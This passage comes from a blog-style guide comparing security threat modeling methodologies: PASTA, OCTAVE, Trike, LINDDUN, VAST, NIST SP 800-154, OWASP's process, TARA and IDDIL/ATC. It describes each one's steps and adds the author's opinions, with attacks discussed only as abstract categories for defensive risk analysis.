You could further overlay nodes and paths with other contextual data. For example, you could associate nodes with a cost or time weight. You could also overlay security controls information. ¹¹
Commonalities from one tree to another can be considered attack patterns. ²⁶
A single branch on an attack tree is considered an attack path.

To create a tree, first start by enumerating all possible attack goals. (Warning: Attack trees can get pretty big, so you may want to start small and build out from there). Remember, a list of attack scenarios was developed in the threat analysis stage (Stage 4). For each threat, create leaf nodes which represent the actions, weaknesses or vulnerabilities that would need to be present for the attacker to succeed. Each attack / threat / goal has a separate tree, and when combining all trees together, you create a composite attack graph. To add further context and value to an attack tree, consider the tree provided below. It adds data such as the asset affected, the use and abuse cases involved, library-mapped attack patterns and even explicitly-defined impacts! ⁹

Attack trees can and should be used to make security decisions. By performing an attack tree exercise, you can see if a system is vulnerable to an attack. You can also challenge existing security assumptions about a system and ultimately better understand the impact of vulnerabilities. Similarly, you can better understand the risk / impact mitigated by controls that you can overlay on or between nodes within the attack tree.

* Note: In a future update to this section, I will be adding details around misuse cases in the context of attack trees. Stay tuned!

Attack Tree References

Attack Tree Tools
Extra Reading: Guided design of attack trees: a system-based approach
Extra Reading: An Evolutionary Approach of Attack Graphs and Attack Trees: A Survey of Attack Modeling

PASTA Stage 7: Risk & Impact Analysis

Qualitative risk analysis is subjective, using categorical associations, whereas quantitative risk analysis is objective, utilizing numerical values.
4 traditional ways to deal with risk: mitigation, transference, acceptance and avoidance.
To conduct a gap analysis at a basic level, you need to know your current state and your desired state. Your desired state could align with an industry-standard security framework (e.g. ISO 27001, SOC 2 Type II, etc…), or it could be simply mitigating known risks to an acceptable level.
Residual risk can be rudimentarily calculated by taking (Vuln * Attack * Impact) and dividing by Countermeasures. ⁹
There are a bunch of risk modeling frameworks that can be employed at this stage.
The application risk profile I see as a high-level description of the risk the application faces as well as the risk to the business given the current state of the system.
The threat matrix (in my mind) is a simpler, tabular version of the threats produced in Stage 4, coupled with the assets identified in Stage 3 and the vulnerabilities discovered in Stage 5.
With a prioritized list of risks, consult one of the many control frameworks to begin building a comprehensive risk mitigation strategy, or at least a list of targeted risk treatments.

Thoughts on PASTA

Phew! This methodology is a doozy… I list some thoughts and extra meatballs-of-wisdom for PASTA below.

To perform a PASTA-style threat model by-the-book is an incredibly huge undertaking. It requires a massive amount of data collection as inputs and an even greater amount of effort producing the litany of output artifacts required to achieve success in the final stage.
- Creating countless diagrams, matrices, lists, trees, graphs… is VERY time-consuming. It took me a gross amount of time just to make the pretend artifacts for this guide. Attack trees are especially high LoE.
Though I feel relatively comfortable in saying I’ve explained the spirit of PASTA quite thoroughly, there are bits here and there that I’m sure I either misrepresented, left out or otherwise goofed on. My understanding of PASTA is based on quite a bit of open-source research, but unfortunately none of that research involved actually having access to the official book in which it is formally described. The book is like $100+ which is pretty crazy imo.
For another take on a PASTA-like threat modeling approach, check out TMM from the KTH Royal Institute of Technology. TMM simplifies the process of threat modeling relative to PASTA-classic (which we know is hyper-involved) and adds the risk modeling benefits (and flair) of FAIR.
VerSprite also has a PASTA + FAIR-inspired approach / tool, the Organizational Threat Model.
- Tony UcedaVélez, co-author of the OG PASTA book also happens to be CEO at VerSprite.
PASTA has 3 different implementation tiers / options. ⁹
- Blind Threat Model: Essentially stages 1 & 2 of PASTA.
- Evidence-Driven Threat Model: Integrate organization threat telemetry (log analysis) and correlate CTI with attack trends from logs. So essentially up through Stage 4.
- Full Risk Based Threat Model: Run statistical/probabilistic analysis on threat data, attack sequences and attack effectiveness. In other words, all 7 stages.
A sample PASTA Threat Modeling exercise from GitLab is linked here.
So who uses PASTA? Well we know GitLab and Versprite do (a variation of it atleast).
The secret sauce of PASTA (get it?) is its obsessive focus on threats, and mapping out exactly how those threats can be realized, or prevented.

OCTAVE

Operationally Critical Threat, Asset and Vulnerability Evaluation (OCTAVE) is an organization-focused framework for identifying and managing information security risks. It was published in 1999 by researchers of the Software Engineering Institute at Carnegie Mellon. Similar to other threat modeling methodologies, OCTAVE includes steps for identifying assets, threats and vulnerabilities. OCTAVE-based assessments include 8 distinct processes across 3 phases. ¹³

OCTAVE Variants

In addition to the original OCTAVE model, two variations of the methodology were also subsequently published. All 3 are listed below. ¹³

OCTAVE (1999)
OCTAVE-S (2003)
OCTAVE Allegro (~2007)

The Phases & Processes of OCTAVE

Rather than provide detailed explanations of each phase and process of OCTAVE, I provide only the high-level description of each below. For more prescriptive guidance on how to accomplish the steps within each phase/process, I would recommend referencing similar sub-processes described from the other methodologies in this guide or by consulting the official OCTAVE publication **. ¹³

Phase 1: Organizational View - Inventory assets, develop a threat profile, gather knowledge from across the enterprise and establish security requirements.
- Process 1: Identify Enterprise Knowledge
- Process 2: Identify Operational Area
- Process 3: Identify Staff Knowledge
- Process 4: Establish Security Requirements
Phase 2: Technological View - Inventory high-priority systems and identify infrastructure policy gaps, vulnerabilities and organizational weaknesses.
- Process 5: Map High-Priority Information
- Process 6: Perform Infrastructure Vulnerability Evaluation
Phase 3: Strategy and Plan Development - Calculate risk by analyzing gathered assets, threats and vulnerabilities. Produce a prioritized list of risks, a protection strategy and a risk management plan.
- Process 7: Conduct Multi-Dimensional Risk Analysis
- Process 8: Develop Protection Strategy

** Note: I may re-visit this section in the future to add additional depth, but for now I have left it pretty bare-bones. I’ve done this because I really don’t care for this methodology.

Thoughts on OCTAVE

With OCTAVE, there is a heavy emphasis in Phase 1 on meticulous and (overly) exhaustive knowledge gathering from across the enterprise. Senior managers, operational managers and rank-and-file staff are all consulted. Though I believe any good threat modeling approach will leverage system owners / organizational stakeholders to describe their systems and discuss the threats / risks / controls that exist within the target system from their perspective, OCTAVE seems to rely exclusively on these system owners rather than dedicated security staff. Though these system owners surely possess authoritative knowledge about their own system(s), they lack the security depth to be effective in providing a meaningful list of threats and security controls.

The goal for Phase 1 of an OCTAVE engagement is to establish security requirements. Personally, I think security requirements should be an input into a threat modeling exercise, rather than an output or goal. Requirements are not really system-specific, rather they should be adopted organization-wide then used to influence and provide boundaries for subsequent threat models. With that said, I see the benefits of using OCTAVE in the nascent stages of information security program development as a way to define threat / risk-informed security requirements.

One thing OCTAVE nails in my mind is the exercise of identifying high-priority components within the target system. Once determined, denote these components within the larger asset map to better understand critical attack paths.

In Process 6 of OCTAVE, “Perform Infrastructure Vulnerability Evaluation”, the assessment team is tasked with selecting intrusion scenarios. This is to be done based solely on previously gathered characteristics of the enterprise but makes no mention of using actual threat intelligence. This is a huge blind spot in my opinion. Sure, you can certainly speculate (and wildly so) as to all of the potential intrusion scenarios in an environment but having an intel-informed approach will yield much better risk-driven results in the end.

Overall, I find OCTAVE tedious, complex and confusing, especially when applied in a more tactical threat modeling sense as its highly prescriptive set of steps is undeniably time-consuming. But don’t take it from me, the SEI team themselves say as much in a subsequent (more simplified) OCTAVE release…

“Finally, given the size and complexity of the OCTAVE method, it is easy to imagine that some organizations have significant challenges in embracing and using the OCTAVE approaches. Absorbing hundreds of pages of process documentation, understanding the accompanying worksheets and how to use them, and collecting and organizing the needed data can be challenging tasks. Upon reflection, the sheer volume of data collection is an impediment for some organizations in moving forward with performing the tasks of analyzing and mitigating risks. A streamlined process that reduces ambiguity and is more structured may be more applicable to the needs of organizations that find the existing OCTAVE methods too cumbersome to use.”

To OCTAVE’s credit however, I don’t consider it exclusively a system threat modeling methodology, rather one that is wrapped in a larger risk assessment / management model and meant to evaluate an organization as a whole rather than targeting a specific system. After all, it is defined as a framework for identifying and managing information security risks. When you start to delve into the risk “management” side of things, you start to tread beyond the more limited-scoped responsibilities of typical threat modeling.

OCTAVE-S

OCTAVE-S is a (mildly less complex) variation of OCTAVE classic, (published in 2003) tailored to constrained, less hierarchical organizations. It is meant to be conducted by a small team (3-5 people) of inter-disciplinary individuals with broad knowledge of the organization. In reality, it’s pretty much the same process (with the same flaws) and with only two notable differences.

OCTAVE-S assessments are conducted by a small team rather than having expansive, formal workshops across the organization interviewing all managers and technical staff. This potentially helps reduce some overhead but the data needed as input(s) across all the phases does not materially change (with the exception of the bullet below).
Exclusion of technical vulnerability data in favor of evaluating higher-level secure configuration processes. The expectation is that smaller organizations outsource or otherwise have abstracted processes which would limit the ability (or need) to gather this more granular vulnerability data.

OCTAVE Allegro

OCTAVE Allegro (circa 2007) is the final distillation of the original OCTAVE methodology, the goal of which is to produce more robust results without the need for extensive risk assessment knowledge. In other words, it more closely resembles an actual threat modeling process and less-so a comprehensive risk assessment framework. The process flow for OCTAVE Allegro is depicted below.

Thoughts on OCTAVE Allegro

It’s great that the OCTAVE team realized that OCTAVE and OCTAVE-S were overly cumbersome and I think the Allegro variant is a decent model with some worthwhile bits. With that said, it ultimately would not be my threat modeling scheme of choice in any context.

OCTAVE Allegro introduces some over-indulgent concepts such as information “containers” and “environment maps”. The environment map seeks to capture all places (what they refer to as containers) where an “asset” is stored / transported / processed and must then be classified as “technical”, “physical” or “people”. I’m not saying there is no security value in capturing this level of detail, just that it is overly-involved and has low RoI.

Risk Measurement Criteria

One aspect of OCTAVE Allegro I think is unique and pretty useful is the concept of defining risk measurement criteria. I think this criteria is something that should be established at an organization-wide level, rather than attributed to a specific threat model, but nevertheless this concept has real value. One of the hardest aspects of threat modeling and more broadly, risk assess-ing is understanding and calculating true business risk / impact. By taking the time to formally develop risk measurement criteria, you will ultimately be more successful in creating truly risk-prioritized outcomes from your threat modeling assessments. Some examples of risk categories from OCTAVE Allegro are listed below.

Reputational / customer confidence (e.g. customer loss, brand degradation)
Financial (e.g. operating costs, revenue loss, one-time loss)
Productivity (e.g. staff hours)
Safety and health (e.g. life, health, safety)
Fines / legal penalties (e.g. fines, lawsuits, investigations)
or a User-defined impact area

Trike

Trike (circa 2006) is a unified, conceptual framework for security auditing from a risk management perspective through the generation of various models. Trike’s distinguishing features are its high level of automatability, defensive-focus and purpose-built (open-source) Trike tool. The Trike v.1 threat modeling process is defined by its 4 distinct modeling phases (listed below). ¹⁴

Trike Requirements Model

A Trike threat model begins by first building the requirements model. To do so, the following inputs are needed.

Understanding of what the system is intended to do at a high level (i.e. an application profile).
The Actors (human) who are interacting with the system.
The Assets that actors interact with. Assets are discrete data entities or physical objects with inherent value within the system.
The (business-defined) intended actions that are taken by said actors.
- Actions can be decomposed via CRUD (i.e. “create”, “read”, “update” and “delete”).
- Unintentional behavior is not included within the requirements model.
The Rules that exist within the system to constrain an actors actions.
- Rules for an action are a set of declarative sentence fragments connected by logical connectives (“and”, “or” and “not”).

These inputs are ultimately expressed in a tabular format referred to as an actor-asset-action matrix (AAA). In an AAA matrix, columns are assets, rows are actor roles and cells are quad-divided for each C-R-U-D action. Each respective action-cell can be set to allowed, disallowed or action with rules. An example of what this matrix could look like is provided below.

Access Control Matrix

An actor-asset-action-matrix is also referred to as an access control matrix.

The Trike help spreadsheet can be download here. (Warning: It is a truly unwieldy beast.)

You can download my actor-asset-action matrix file here.

Trike Implementation Model

Once the requirements model has been defined, a data flow diagram (DFD) should be created. Within the DFD, other implementation details should be captured such as:

Process technologies (e.g. OS, libraries, platforms, versions, etc…)
Data store type (e.g. file store, database, registry entry, version info, etc…)
Data flow protocols and directionality
Trust boundaries and what enforces them
Other security technologies and where they are used (i.e. encryption, authentication, authorization, firewalls, certificates, passwords, etc…)

With the DFD in-hand, we begin creating / layering use flows by taking each action defined in the system requirements model and tracing that action’s path through the DFD. Use flows are broken into segments when traversing an external interactor (this includes when traversing a user). * Use flows are an experimental feature of Trike.

Use Flow Map

* Note: In a future update to this guide, I will provide details and a depiction of a Use Flow map in a threat modeling context. Stay tuned!

Trike Threat Model

To build a Trike threat model, we begin with threat generation. Within Trike, threats are defined as anything more or less than the intended actions. Threats are always events rather than specific (threat) actors. Threats within a system are purely deterministic, given the actor-asset-action matrix. In other words, given a static matrix, the same set of threats should be generated regardless of who is running the exercise. The threat taxonomy for Trike is extremely simple, with only two categories - Denial of Service (DoS) and Elevation of Privilege (EoP). Let’s contrast this to the threat taxonomy first introduced by STRIDE.

Spoofing: Trike considers spoofing an “attack” rather than a threat in most cases. However you slice it, Trike equates spoofing to a (Type 2) EoP whereby an actor is able to violate a rule.
Tampering & Information Disclosure: Both are also considered instances of (Type 2) EoP within Trike.
Denial of Service (DoS): When a legitimate action is denied. One DoS threat is generated for each intended action.
Elevation of Privilege (EoP):
- Type 1: When an actor performs an action which no actor is intended to perform on an asset.
- Type 2: When an actor performs an action on an asset despite the rules for that action.
- Type 3: When an actor uses the system to perform an action on some other system’s asset (i.e. the “social responsibility” threat).

From here, attack trees should be generated for threats. * Trike recommends trees be expanded only to the point where there is enough information to reasonably decide whether the risk caused by the threat has been reduced to an acceptable risk level. This will limit the overhead of having to complete an entire tree for every. single. threat.

Trike Risk Model

Trike employs a quantitative approach to risk modeling, and describes it as “highly experimental”. As with everything in the Trike world though, it is quite formal and explicitly defined. To perform the Trike risk model, we calculate impact & likelihood as defined below.

Trike Impact Calculation

First, assign all assets within the defined system a dollar ($) amount based on its inherent business value.
On a scale from 1-5 (5 being the most undesirable), rank each defined action-to-asset pair (this is a qualitative measure). Each pair should be ranked twice:
- (1) For when an authorized action cannot be completed in accordance with the rules (i.e. the DoS threat impact/exposure metric), and…
- (2) For when an attacker completes an action despite the rules which disallow it (i.e. the EoP threat impact/exposure metric)
On a scale from 1-5 (where the most untrusted (likely anonymous) is a 5), rank each actor within the defined system.

Now with these inputs, we can create an exposure value for each threat. The exposure calculation is the value of the asset multiplied by the action-specific threat impact score.

Trike Likelihood Calculation

Having completed the attack tree(s) in the threat modeling phase, we should now have a catalog of discovered weaknesses & vulnerabilities. The second step (probability calculation) of Trike’s risk modeling approach is to take each weakness / vulnerability and rank them on three separate scales (again from 1-5).

Reproducibility: How easy a given weakness is to reproduce.
Exploitability: How technically easy an attack is to conduct.
Actor Risk: The risk value attached to the least trusted actor who is able to target the weakness (this was calculated in Step 3 of the impact calculation).

* While performing these rankings, consider the mitigations that currently exist along the identified attack paths and whether those mitigations reduce the score(s). (see QTMM, Stage 5)

With these three scores, we can now calculate the final probability of a weakness by multiplying all three subscores. * Trike defines an additional process for further calculating vulnerability probability by examining parallel success paths in the attack tree, but for the sake of this write-up we will forgo explaining this.

OK! Now that we have both the impact and likelihood scores, we can calculate the final risk score by multiplying everything together. For each threat, simply use the highest calculated applicable vulnerability risk. An example of what this risk calculation might look like is provided below. It’s very involved as you can see. As you scale assets and actors, the calculations can grow geometrically…

I’ve provided my sample risk calculator spreadsheet here.

Thoughts on Trike

Though not perfect, overall I like Trike. Its defensive-focused approach coupled with its highly formalized nature make it fairly unique in the threat modeling space. Below, I provide a list of other incongruous thoughts about Trike.

Despite what the authors say - “Trike was built to bring efficiency and effectiveness to existing threat modeling methodologies” - I’m not sure how you cleanly apply this methodology as an overlay to others. As I spend more time with it, my feelings on this may soften, but I expect the highly formalized nature of Trike to not blend so well with other methodologies.
Much like VAST, automation & scalability are key. Unlike VAST though, Trike does not dispense with the consultation of actual security experts (phew!).
Somewhat counterintuitively, Trike doesn’t require knowledge of, or establishment of, a dedicated CTI source for generation of threats. Instead, threat generation is formed in a “defensive” manner by simply defining exactly how the system should work and designating anything not defined as a threat.
The problem with building a complete state-machine model (which is what Trike prescribes) for a given system is that to do so, it is (very likely) a complex and time-consuming effort as the scope of your target system expands.
With that said, if you can achieve a well-defined state-machine for the target system, you gain a very pure level of repeatability when it comes to performing automated threat models. Simply feed the same inputs in (attack library, implementation model, etc…) and you’ll get the same outputs!
The Trike authors claim the framework / tool is under heavy development but evidence is to the contrary. Their last published talk was in 2012, the last update for their tool (hosted on SourceForge of all places - but now points to GitHub) was in 2019 and the FAQ suggested a v2 of the tool would be released (maybe) in 2013. (It’s 2022 and still no v2…)
Some of the more detailed, systematic sub-processes of Trike are particularly… not-human-friendly. See Section 2.1 of the Trike v.1 white paper to see what I mean. Of course this is where the tool comes into play. I wouldn’t recommend hand-jamming a Trike threat model to the letter… very sweaty.
There are a number of other author-stated capability gaps within Trike…
- No support for the creation of DFDs.
- Attack trees are not auto-generated.
- Trike doesn’t come preloaded with a managed attack library.

LINDDUN

LINDDUN (circa 2010) is a privacy-focused + threat-based, threat modeling methodology. The LINDDUN privacy engineering framework provides a systematic approach to identifying privacy threats in software systems. This methodology consists of 3 fundamental steps (depicted below). ¹⁵

Step 1: Model the system - LINDDUN relies on a traditional data flow diagram to model the system.

Step 2: Elicit threats/risks - Each element (e.g. entity, data store, data flow and process) within the model should be analyzed for potential threats. A 2-dimensional matrix (i.e. mapping table) is built, denoting (i.e. with an ‘X’) which components have potential threats across each of the 7 threat categories. For each X in the generated table, a threat tree (similar to an attack tree, see Step 2C. Document threats of the LINDDUN framework) can be created to determine likely attack paths. The 7 privacy threat categories (linked to their respective threat tree catalogs) are listed below. ¹⁶

LINDDUN Threat Categories

The threat categories below represent 7 distinct privacy-oriented issues that may be found within a system. (These resemble the QTMM PPGs).

Linkability: An adversary is able to link two items of interest without knowing the identity of the data subject(s) involved. (Desired Property: Unlinkability)
Identifiability: An adversary is able to identify a data subject from a set of data subjects through an item of interest. (Desired Property: Anonymity / pseudonymity)
Non-repudiation: The data subject is unable to deny a claim. (Desired Property: Plausible deniability)
Detectability: An adversary is able to distinguish whether an item of interest about a data subject exists or not, regardless of being able to read the contents itself. (Desired Property: Undetectability / unobservability)
Disclosure of information: An adversary is able to learn the content of an item of interest about a data subject. (Desired Property: Confidentiality)
Unawareness: The data subject is unaware of the collection, processing, storage, or sharing activities (and corresponding purposes) of the data subject’s personal data. (Desired Property: Content awareness)
Non-compliance: The processing, storage, or handling of personal data is not compliant with legislation, regulation, and/or policy. (Desired Property: Policy and consent compliance)

Step 3: Manage threats - Threats should be prioritized via risk assessment (one of your choosing, as LINDDUN does not prescribe a specific framework) and mitigations should be selected (LINDDUN so graciously provides a mitigation strategy taxonomy).

Thoughts on LINDDUN

LINDDUN is cleanly documented, simple and unique. It is purpose-built for the increasingly-important world of privacy. It doesn’t seek to reinvent the wheel, instead leaning on widely adopted strategies for modeling systems (DFDs), mapping attack paths (attack trees) and prioritizing findings. The LINDDUN team provides easy-to-use resources, threat tree libraries, mitigation catalogs and literally everything else you would need to be successful in conducting a privacy-oriented threat model.

VAST

Visual, Agile and Simple Threat (VAST) modeling is an abstract methodology from the team at ThreatModeler. VAST is keenly focused on scalability, which in this context can be described as the use of automation, integration and collaboration to perform threat modeling in an Agile practice. Other important tenants of VAST include providing a self-service model that does not rely on dedicated security expertise, as well as one that will produce valuable, actionable outputs for inter-disciplinary stakeholders. To visualize security concerns at both the application and infrastructure layers, VAST leverages two different types of threat modeling styles - application threat models and operational threat models. Application modeling focuses on the application itself using process-flow diagrams while operational modeling goes beyond the application, visualizing the interconnected infrastructure in which the application resides using traditional data-flow diagrams (DFDs). Examples of these two modeling techniques are provided below. ¹⁷^,¹⁸

Application Threat Model

Depicted below is an Application Threat Model, visualized using a process-flow diagram. ¹⁸

Operational Threat Model

Depicted below is an Operational Threat Model, visualized using a data flow diagram (DFD). ¹⁸

Principles of VAST

The essential ingredient for ThreatModeler’s version of VAST is of course their commercial tool which comes preloaded with a proprietary threat library and is capable of performing automated threat modeling. In a more abstract sense, VAST can be thought of less as an actual threat modeling methodology and more-so as a set of principles by which other threat modeling methodologies should strive toward. These principles very transparently being…

Visual: Leverage multiple visualization techniques such as “application” and “operational” modeling to best understand and document assets, data flows, threats and ultimately, risks from a variety of perspectives.
Agile: VAST requires the use of a tool (such as ThreatModler’s tool, but doesn’t necessarily have to be) that is easily automatable within a DevOps pipeline. This provides scalability and consistent repeatability.
Simple: Simplicity is key, as complexity hinders repeatability and scalability. As we know from our review of OCTAVE, having an overly thorough process is not necessarily a benefit.
Threat: Threats are the name of game! By focusing on threats, we most effectively determine true risks to a system.

Thoughts on VAST

The efficacy of VAST in the context of its implementation via the ThreatModeler tool is not something I can speak to, as evaluating it would require access to, and experience with the ThreatModeler tool itself. With that said, I think a model which abides by the VAST principles, can be done at scale, can be performed by anyone, and in the end, yield actionable results, is about as ideal of a form that a threat modeling methodology can take. Sure, VAST may not produce the same depth of findings, or the perfectly prioritized list of risks that some of the other methodologies might, but what good are those other methodologies if they are too cumbersome (looking at you OCTAVE) to use at scale?

Threat Modeling Methodology Comparison

Below you can see ThreatModeler’s take on how different, popular threat modeling methodologies compare (which I think is a pretty genuine, mostly unbiased attempt). ¹⁷

Data-Centric System Threat Modeling, NIST SP 800-154

NIST Special Publication 800-154: Guide to Data-Centric System Threat Modeling , published by the National Institute of Standards and Technology (i.e. NIST), describes threat modeling as, “…a form of risk assessment that models aspects of the attack and defense sides of a particular logical entity, such as a piece of data, an application, a host, a system, or an environment.” This particular guide to threat modeling focuses on protecting data rather than systems, and is meant to define a set of principles that other methodologies could also adopt. Below, I have briefly summarized the steps of this threat modeling methodology. ²¹

Data-Centric System Threat Modeling Steps

This section contains the steps for conducting a data-centric threat modeling exercise (per NIST SP 800-154, Section 4). ²¹

Step 1: Identify and characterize the system and data of interest.
- Authorized data locations - For all data of interest, document where data is stored, how data is transmitted, in what environments data is processed, how data is input into the system and finally, how data is output from the system.
- Security objectives - What are the confidentiality, integrity and availability (CIA) requirements for the data within the system?
- Authorized actors - What people and processes have an authorization-level high enough to affect the security objectives?
Step 2: Identify and select the attack vectors to be included in the model.
- Attack vectors in this methodology can be described as content (typically malicious) from a source (i.e. web site) acted upon by a processor (i.e. web browser). An attack vector example given in the publication is, “Malicious web page content (content) downloaded from a web site (source) by a vulnerable web browser (processor).“
Step 3: Characterize the security controls for mitigating the attack vectors. i.e., for each attack vector from Step 2…
1. Identify a (feasbile) mitigating control.
2. Evaluate assumed effectiveness of the selected control.
3. Estimate negative implications (e.g. cost, usability/performance degradation, LoE, etc…) of implementing that control.
Step 4: Analyze the threat model.
- The guide timidly suggests a couple of risk scoring approaches in this final step, none of which I think are worth regurgitating here. Essentially, (as is similarly done with many other methodologies) we want to take some combination of data criticality, attack vector likelihood / impact and control effectiveness, across all pairings and begin prioritizing risk treatments.

Thoughts on the Data-Centric Approach by NIST

This methodology introduces some novel-ish concepts, and though it is notably light in some areas with respect to executing a data-centric threat modeling exercise, my verdict is that it’s a worthy addition to the overall methodology lineup. Below I’ve listed an assortment of other thoughts about what NIST put together. ²¹

NIST SP 800-60 (and inherently FIPS PUB 199) are specifically recommended as a supplemental guides for facilitating the categorization & mapping of data. This is a critical pre-Step 1 action.
I really like the data characteristics that this methodology asks us to identify in Step 1, but it is very light on how to actually inventory / identify that data. This is of course the hard part.
I can appreciate the thought that went into the syntactic attack vector generation approach this methodology puts forth, but I think describing all attacks as content + source + processor is rather tedious and oddly patronizing.
This methodology caters towards the data-obsessed. I think this heavy focus on data security has certain merits, as in many cases a threat actor’s intended impacts are indubitably data-specific - but, there are many system-specific attacks that have less to do with data that would still translate to high risk for a business. For this reason I don’t recommend going all-in on a data-only approach to threat modeling.
Putting meaningful thought into the negative implications of each suggested control is an underrepresented part of the controls conjuration step of other threat modeling methodologies. Of course this should be done! After all, it’d be too easy to just unplug all our computers and throw them into the ocean - no hackers getting our data now, right?! But this just isn’t a feasible option.
It’s clear that the authors (Murugiah Souppaya, NIST and Karen Scarfone, Scarfone Cybersecurity) ran out of creative juices when they got to Step 4. They call this final step, “Analyze the threat model” and then proceed to suggest a couple half-baked (“half” being very generous) scoring approaches for findings. “Analyze” is a pretty generic term - perhaps what they meant is risk model? In any case, what they suggested is pretty weak.

OWASP Threat Modeling Process

OWASP has a published Threat Modeling Process (a.k.a. “TMP”) which consists of 3 (very familiar) steps. Their methodology borrows pretty heavily from the more well-established players (i.e. PASTA & Microsoft) and is unsurprisingly web application-specific. I think OWASP’s own write-up is fairly to-the-point so I’ll only provide a condensed version of the steps below. ²²

OWASP TMP Steps

This section describes the steps for conducting an OWASP TMP exercise. OWASP also provides a playbook to assist with an assessment. ²²

Step 1: Decompose the Application
- Construct an application profile (remember from PASTA?) - include application name, version, description, etc…
- Inventory and uniquely assign IDs to system components including external dependencies, entry/exit points (interfaces to/from the app), assets (potential targets) and trust levels (privileges required to interact).
- Produce a data flow diagram (DFD).
Step 2: Determine and Rank Threats
- Select your preferred threat classification framework. OWASP uses STRIDE, but in theory, other frameworks could be subbed in. The authors also reference the “ASF” or Application Security Frame, which is another set of threats (and corresponding controls) sourced from the OWASP Code Review Guide.
- Perform threat analysis (should remind you of PASTA again) by generating threats tied to components/flows within the modeled system. To facilitate this process, consider using threat trees and/or use/abuse flows.
- Rank threats provided known risk factors using a risk assessment/scoring model such as DREAD (which is what OWASP suggests).
Step 3: Determine Countermeasures and Mitigation
- Map corresponding countermeasures to identified threats using an appropriate controls framework.
- Once mapped, determine residual risk. For example, resulting risks could simply be defined as being “not mitigated”, “partially mitigated” or “fully mitigated”.

Thoughts on OWASP’s TMP

Alright! So here’s my list-based take on OWASP’s TMP…

I like the focus / inclusion of dependencies as a potential attack vector / input interface. Gives me supply chain attack vibes, which is all the rage these days.
This methodology emphasizes the concept of entry points (and to a lesser degree exit points). By understanding how/where an attacker can interface with a system we can better determine threats/attack paths.
Oh yeah! Threat trees are back.
This concept of an “ASF” (Application Security Frame) has popped up in a few threat modeling methodologies now (1, 2, 3). It is a concept I was not that familiar with prior to this research, but will more carefully consider moving forward.
Oh no, STRIDE and DREAD are getting more stage time, how dreadful! ²⁸
OWASP sure doesn’t strain themselves coming up with a process for calculating residual risk. Just leverage an existing methodology, they say.
ID’ing elements (i.e. dependencies, entry points, assets, trust levels) within the DFD is awesome and looks great.

TARA

Threat Assessment and Remediation Analysis (TARA) , designed by MITRE in 2014 (not to be confused with Intel’s TARA), is described as, an engineering methodology used to identify and assess cyber vulnerabilities and select countermeasures effective at mitigating those vulnerabilities. What makes TARA unique is its application of a (self-managed) catalog of controls-to-attack-vectors and its strategies for applying specific countermeasures based on specified risk tolerance. ²³

TARA Assessment Workflow

This section details the TARA assessment process flow, as well as the actions within each of the 3 distinct phases of the methodology.

Step 1: Cyber Threat Susceptibility Analysis (CTSA)
- Compile technical details to build a cyber model of the system. This is effectively an application profile (similar to PASTA:1, Trike:Req and OWASP:1). This methodology also recommends using a Crown Jewels Analysis (a.k.a. “CJA”) as input into this step.
- Search the managed threat catalog for plausible attack vectors based on the now-documented architecture.
- Perform a threat-based risk assessment. TARA suggests a simple, qualitative risk model such as the “Risk Cube” (i.e., impact x likelihood).
- The output of the risk assessment is a vulnerability matrix which contains a list of (ID’ed) attack vectors with corresponding risk scores.
Step 2: Cyber Risk Remediation Assessment (CRRA)
- Vulnerabilities (from the vulnerability matrix) are mapped to countermeasures sourced from the managed controls catalog.
  - The TARA Catalog consists of a series of attack-to-control pairings which are described as 3-tuples of the form, <Countermeasure ID, Attack vector ID, Countermeasure effect>, where the effect is “preventative” (P) or “mitigating” (M).
- An analysis is performed to estimate the utility and cost of each control-to-attack pair which ultimately yields the mitigation mapping table. This table is essentially the first 5 rows of the matrix depicted below.
- A holistic countermeasure selection strategy is developed by evaluating the solution effectiveness table (depicted below).

Step 3: Knowledge Management (KM)
- Extract applicable attack vectors from open (or closed) source cyber threat libraries (i.e. CAPEC & CVE).
- Further bolster managed TARA Catalog content to reflect changing landscape of known threats and respective countermeasures.

Thoughts on TARA

A collection of my thoughts about TARA are listed below.

This methodology introduced me to the MORDA risk assessment model. Fun!
TARA is not rigid, allowing swappable forms of risk ranking, attack generation, utility/cost scoring, etc…
The methodology was purpose-built for achieving mission assurance (MA) during a federal acquisition process.
The official TARA white paper claims “Over a dozen TARA assessments have been conducted since 2011…”. This paper was published in 2014… So, only slightly over a dozen TARA assessments in a 3-year timespan? Yikes!
TARA calls on YOU to maintain an up-to-date threat-to-control catalog. This is incredibly difficult to manage without a full team dedicated to the pursuit. Given this is the standout feature of the methodology, I think it’s what cripples it.

IDDIL/ATC

IDDIL/ATC is a threat-driven threat modeling approach developed by Lockheed Martin in 2019. A security strategy which is driven by compliance or through implementation of a pre-canned list of controls is doomed to fail in the face of a realistic slate of threats. It is on this basis that this methodology eschews compliance and any emphasis on merely addressing vulnerabilities and instead favors mitigating true threats. IDDIL/ATC stands for “There are no idle threats - they attack” and consists of two distinct phases. ²⁴

Phase 1: Discovery (IDDIL)
Phase 2: Implementation (ATC)

IDDIL/ATC was also designed to integrate cleanly with a typical software engineering lifecycle (SDL). This is demonstrated via the graphic below.

IDDIL/ATC Discovery Phase (IDDIL)

This section describes the initial phase of the IDDIL/ATC methodology. The 5 steps of this phase correspond with “IDDIL”. ²⁴

Identify the Assets: Identify business-critical assets as well as assets attackers may be uniquely interested in.
Define the Attack Surface: Determine attack surface by mapping macro-level components / elements of the system that contain, transmit or access assets. Essentially, produce a data flow diagram (DFD).
Decompose the System: For all components and flows within the model, layer in technology information and information about security controls present within the overall system. (Reference the Trike Implementation Model)
Identify Attack Vectors: Leverage vulnerability catalogs and attack libraries to document attack paths, for example, by using attack trees.
- To be successful here, a threat categorization system should be selected (or developed) to assist with modeling and analysis of threats. IDDIL/ATC suggests using a tweaked version of STRIDE, “STRIDE-LM” which introduces the lateral movement threat category. As part of this threat categorization matrix, include a list of controls for each threat that provide some mitigating factor. (i.e. “I” in STRIDE is for information disclosure - an example control could be encryption.)
List Threat Actors & Objectives: Leveraging CTI, develop a list of potential threat actors.
- It is suggested to create threat profiles for each asset / component of the system. A threat profile is a tabular summary which contains information like threat types, attack surface, attack vectors, threat actors, impacts, vulnerabilities, controls and other related information.
- To best understand the relationship between threats, assets and controls, reference the diagram provided below.

Threats-Assets-Controls Relationship

IDDIL/ATC is a threat-driven methodology. To best understand how threats interact with assets and controls, we visualize their relationship as depicted below. ²⁴

IDDIL/ATC Implementation Phase (ATC)

This section describes the second (and final) phase of the IDDIL/ATC methodology. The 3 steps of this phase correspond with “ATC”. ²⁴

Analysis: Determine the impact of a successful compromise for each threat scenario (use a vulnerability scoring tool like CVSS).
